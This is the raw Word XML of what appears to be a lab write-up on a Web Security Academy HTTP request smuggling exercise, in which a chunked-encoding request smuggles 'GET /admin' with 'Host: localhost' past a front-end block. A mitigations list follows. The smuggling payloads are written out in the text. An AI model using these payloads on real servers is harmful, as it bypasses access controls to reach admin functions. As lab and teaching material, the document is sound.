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377E" w14:textId="456CB598" w:rsidR="00320924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SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E100013" w14:textId="2C92B04B" w:rsidR="0038190F" w:rsidRPr="00DB03A9" w:rsidRDefault="001C116F" w:rsidP="00D12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This application </w:t>
      </w:r>
      <w:r w:rsidR="000E1F7D" w:rsidRPr="000E1F7D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>involves a front-end and back-end server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, and the front-end server doesn't support chunked encoding. There's an admin panel at /admin, but the front-end server blocks access to it.</w:t>
      </w:r>
      <w:r w:rsidR="006B461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We will try to </w:t>
      </w:r>
      <w:r w:rsidR="00D12E31" w:rsidRPr="00D12E31">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>smuggle a request to the back-end server that accesses the admin panel</w:t>
      </w:r>
      <w:r w:rsidR="00D12E31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581D0C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C86A0C" w14:textId="3E6ADA0C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868DC9D" w14:textId="18030C96" w:rsidR="0038190F" w:rsidRDefault="00D9364E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the web application and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 xml:space="preserve">try to visit the </w:t>
      </w:r>
      <w:r w:rsidR="00587C48" w:rsidRP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>/admin</w:t>
      </w:r>
      <w:r w:rsidR="00587C4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587C48">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>page directly, we notice that the request got blocked due to front-end controls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6651B587" w14:textId="7390D526" w:rsidR="00EC0F17" w:rsidRDefault="00EC0F17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Repeater send a request to Payload 1 twice and we see </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0F17">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">that the merged request to /admin was rejected due to not using the header </w:t>
      </w:r>
      <w:r w:rsidRPr="00B22C28">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Host: localhost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CF38D56" w14:textId="3CB0B8FD" w:rsidR="0097242B" w:rsidRDefault="0097242B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Send the request again after alteration like we did in Payload 2</w:t>
      </w:r>
      <w:r w:rsidR="00523712">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and we got </w:t>
      </w:r>
      <w:r w:rsidR="00523712" w:rsidRPr="00523712">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>blocked due to the second request's Host header conflicting with the smuggled Host header in the first request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37E6699" w14:textId="3D98A4C0" w:rsidR="007B0901" w:rsidRDefault="00343C7E" w:rsidP="002A3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 will append an empty parameter to the request so that we can mute all the other values of the original header.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048EB7A2" w14:textId="47A86DAC" w:rsidR="00DC5264" w:rsidRPr="000141D4" w:rsidRDefault="00355D0A" w:rsidP="000141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Inject the </w:t>
      </w:r>
      <w:r w:rsidR="00EC277D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Payload 3</w:t>
      </w:r>
      <w:r w:rsidR="00BE3AD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 the Repeater tab and send the request twice</w:t>
      </w:r>
      <w:r w:rsidR="00462799">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, we see that </w:t>
      </w:r>
      <w:r w:rsidR="00167ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>we are now able to access the admin panel</w:t>
      </w:r>
      <w:r w:rsidR="00C1519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2D3E82D" w14:textId="77777777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B9B824" w14:textId="2C663BFE" w:rsidR="00B0667E" w:rsidRDefault="0038190F" w:rsidP="001D29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047E8C27" w14:textId="77777777" w:rsidR="004F6582" w:rsidRPr="004F6582" w:rsidRDefault="004F6582" w:rsidP="004F6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05D359DC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182B0E6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4F6582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6D4A28B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Content-Length: 37</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666C8483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C248382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4FD5FDF9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5F7D1B16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D850ED4" w14:textId="77777777" w:rsidR="004F6582" w:rsidRPr="004F6582" w:rsidRDefault="004F6582" w:rsidP="004F6582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1B15FEF3" w14:textId="5496D42C" w:rsidR="00F42A65" w:rsidRPr="004F6582" w:rsidRDefault="004F6582" w:rsidP="004F6582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4F6582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129A6BA2" w14:textId="73598FB1" w:rsidR="00D77D34" w:rsidRPr="00D77D34" w:rsidRDefault="00D77D34" w:rsidP="00D77D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491FF20E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6995D282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lastRenderedPageBreak/>
        <w:t>Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D77D34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33B9B3B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Content-Length: 54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76317D27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39B280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5C16F8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31EA144B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C193FCF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6FB1DBBC" w14:textId="77777777" w:rsidR="00D77D34" w:rsidRPr="00D77D34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496A312A" w14:textId="1547BF19" w:rsidR="00F42A65" w:rsidRDefault="00D77D34" w:rsidP="00D77D34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77D34">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>X-Ignore: X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282B2C61" w14:textId="77777777" w:rsidR="00D36FCD" w:rsidRPr="00D36FCD" w:rsidRDefault="00D36FCD" w:rsidP="00D36F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POST / HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B52480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YOUR-LAB-ID.web-security-academy.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA0FBC5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D36FCD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40E7914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116</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EBC388B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Transfer-Encoding: chunked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65D1DC60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002B56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0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B61A1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722D19BA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GET /admin HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4740F645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Host: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22349F18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Content-Type: application/x-www-form-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D36FCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>urlencoded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="57C81004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Content-Length: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311B616A" w14:textId="77777777" w:rsidR="00D36FCD" w:rsidRPr="00D36FCD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5203029A" w14:textId="0274F1EF" w:rsidR="00A550C3" w:rsidRPr="004F6582" w:rsidRDefault="00D36FCD" w:rsidP="00D36FCD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 w:rsidRPr="00D36FCD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2181D516" w14:textId="77777777" w:rsidR="00F42A65" w:rsidRDefault="00F42A65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FD9913" w14:textId="75859A6A" w:rsidR="0038190F" w:rsidRDefault="0038190F" w:rsidP="00DC1F1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54B869F8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Consistent Parsing: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Ensure that both front-end and back-end servers consistently handle HTTP request encodings. If the back-end server does not support chunked encoding, the front-end server should be configured to reject chunked encoded requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C622DD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Uniform Architecture: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Using a unified server architecture can help. Having both the front-end and back-end functionalities on one server can reduce discrepancies in request handling and eliminate the possibility of smuggling between the two.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693454F8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Network Segmentation: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Separate internal and external facing systems. This reduces the chances of an attacker reaching sensitive internal systems even if they manage to smuggle a request through an exposed endpoint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17ACA263" w14:textId="77777777" w:rsidR="00512205" w:rsidRPr="00512205" w:rsidRDefault="00512205" w:rsidP="005122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Strict Access Control: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Ensure strict access controls on sensitive endpoints like /admin. The back-end system should authenticate and authorize every request to such endpoints, regardless of how they are routed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ED22CEF" w14:textId="48B99934" w:rsidR="0027128C" w:rsidRPr="00512205" w:rsidRDefault="00512205" w:rsidP="002C38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512205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 Web Application Firewalls (WAFs):</w:t>
      </w:r>
      <w:r w:rsidRPr="00512205">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> A WAF can inspect and filter HTTP traffic. It should be configured to detect and block anomalous requests, including those that might have been smuggled.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0027128C" w:rsidRPr="00512205" w:rsidSect="00DC1F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C8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CD6C4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BE4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A0208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01954"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3C666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151814">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="122893582">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="768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81"/>
    <w:rsid w:val="00001A4E"/>
    <w:rsid w:val="000141D4"/>
    <w:rsid w:val="000C7F21"/>
    <w:rsid w:val="000E1F7D"/>
    <w:rsid w:val="00136E28"/>
    <w:rsid w:val="00167ECB"/>
    <w:rsid w:val="00175C1D"/>
    <w:rsid w:val="00184A3E"/>
    <w:rsid w:val="001C116F"/>
    <w:rsid w:val="001D2964"/>
    <w:rsid w:val="001E50DD"/>
    <w:rsid w:val="0022477F"/>
    <w:rsid w:val="0027128C"/>
    <w:rsid w:val="002964CA"/>
    <w:rsid w:val="002A34E4"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00331477"/>
    <w:rsid w:val="00343C7E"/>
    <w:rsid w:val="00355D0A"/>
    <w:rsid w:val="0038190F"/>
    <w:rsid w:val="00412AC9"/>
    <w:rsid w:val="00434981"/>
    <w:rsid w:val="00462799"/>
    <w:rsid w:val="00472120"/>
    <w:rsid w:val="004F02C5"/>
    <w:rsid w:val="004F6582"/>
    <w:rsid w:val="00512205"/>
    <w:rsid w:val="00523712"/>
    <w:rsid w:val="00587C48"/>
    <w:rsid w:val="0060605E"/>
    <w:rsid w:val="00630D8E"/>
    <w:rsid w:val="006528D3"/>
    <w:rsid w:val="00684634"/>
    <w:rsid w:val="006B4613"/>
    <w:rsid w:val="00756049"/>
    <w:rsid w:val="007B0901"/>
    <w:rsid w:val="00880347"/>
    <w:rsid w:val="008D4939"/>
    <w:rsid w:val="0097242B"/>
    <w:rsid w:val="0097490C"/>
    <w:rsid w:val="009861D0"/>
    <w:rsid w:val="009E0BE2"/>
    <w:rsid w:val="00A10746"/>
    <w:rsid w:val="00A550C3"/>
    <w:rsid w:val="00AC02F2"/>
    <w:rsid w:val="00B0667E"/>
    <w:rsid w:val="00B22C28"/>
    <w:rsid w:val="00BA4B21"/>
    <w:rsid w:val="00BE3AD4"/>
    <w:rsid w:val="00BF1CBE"/>
    <w:rsid w:val="00C15196"/>
    <w:rsid w:val="00D12E31"/>
    <w:rsid w:val="00D36FCD"/>
    <w:rsid w:val="00D77D34"/>
    <w:rsid w:val="00D9364E"/>
    <w:rsid w:val="00DB03A9"/>
    <w:rsid w:val="00DC1F12"/>
    <w:rsid w:val="00DC5264"/>
    <w:rsid w:val="00E866B8"/>
    <w:rsid w:val="00EC0F17"/>
    <w:rsid w:val="00EC277D"/>
    <w:rsid w:val="00F42178"/>
    <w:rsid w:val="00F42A65"/>
    <w:rsid w:val="00F80875"/>
    <w:rsid w:val="00FC2878"/>
    <w:rsid w:val="00FC5254"/>
    <w:rsid w:val="00F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4E82"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E8B08E09-ACCF-4FD8-AD77-E205D1E3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26</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-10-04T12:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-06T10:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>